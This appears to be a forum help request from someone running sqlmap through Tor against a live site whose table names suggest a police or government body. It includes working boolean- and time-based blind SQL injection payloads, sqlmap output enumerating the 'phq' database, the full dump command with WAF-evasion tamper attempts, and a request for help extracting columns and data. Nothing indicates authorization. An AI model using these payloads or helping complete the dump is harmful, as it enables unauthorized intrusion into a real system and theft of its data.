I am having issues dumping columns and tables on a vulnerable site with the following points:
---
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: id=275' OR NOT 8874=8874 AND 'kWVH'='kWVH
Vector: OR NOT [INFERENCE]
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=275' AND SLEEP(10) AND 'NtME'='NtME
Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
[13:38:02] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 5.10
web application technology: Apache, PHP 5.2.11, Apache 2.2.3
back-end DBMS: MySQL >= 5.0.12
It has a meta refresh header which I have put into action by sqlmap:
[13:37:51] [DEBUG] got HTML meta refresh header
sqlmap got a refresh request (redirect like response common to login pages). Do you want to apply the refresh from now on (or stay on the original page)? [Y/n] y
I can dump one of the database table names, but other than that there are no columns being dumped or anything else. What I'm seeing on my end is:
[13:49:26] [ERROR] invalid character detected. retrying..
[13:49:31] [INFO] retrieved:
[13:49:31] [DEBUG] performed 10 queries in 12.60 seconds
[13:49:31] [INFO] retrieving the length of query output
[13:52:07] [DEBUG] got HTTP error code: 503 (Service Unavailable) # this is a little weird.
[13:52:07] [PAYLOAD] 275' AND 6147=IF((ORD(MID((SELECT HEX(IFNULL(CAST(table_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x706871 LIMIT 39,1),1,1))>1),SLEEP(10),6147) AND 'oduk'='oduk
[13:52:09] [DEBUG] got HTTP error code: 503 (Service Unavailable)
[13:52:09] [INFO] retrieved:
[13:52:09] [DEBUG] performed 4 queries in 4.94 seconds
Database: phq
[24 tables]
+------------------------------+
| cdm_forme\xe1}_i�p_p�t\x83 |
| cbd_careerrecruitment |
| cbd_catagory |
| cbd_cc |
| cbd_content |
| cbd_ig_msg |
| cbd_menu |
| cbd_menutype |
| cbd_news |
| cbd_noc |
| cbd_ordinance |
| cbd_police_achivement |
| cbd_police_service |
| cbd_press |
| cbd_procurement |
| cbd_recruitment |
| cbd_recruitment_desc |
| cbd_recruitment_result |
| cbd_rejoinder |
| cbd_tab |
| cbd_topnews |
| cbd_un |
| cdb_ |
| cdb_unitdetials |
+------------------------------+
From here I'm getting:
[13:53:09] [INFO] retrieved:
[13:53:09] [DEBUG] performed 4 queries in 46.63 seconds
[13:53:09] [ERROR] unable to retrieve the number of columns for table 'cdm_forme\xe1}_i�p_p�t\x83' in database 'phq'
And so on and so forth. This site is protected by a WAF (generic unknown); tamper scripts are producing the same information and output (space2comment, apostrophemask, etc.).
How I've been trying:
./sqlmap.py -u www.vuln.com/content.php?id=275 --tor --check-tor --level=5 --risk=3 -vv -D phq --tables --columns --dump --invalid-bignum --invalid-string --threads=10 --hex
Question being, do you have any idea on how I can get sqlmap to co-operate with me here? I can manually inject with the found injection points, however I am unable to get sqlmap to do the auto injection for me. Need some help.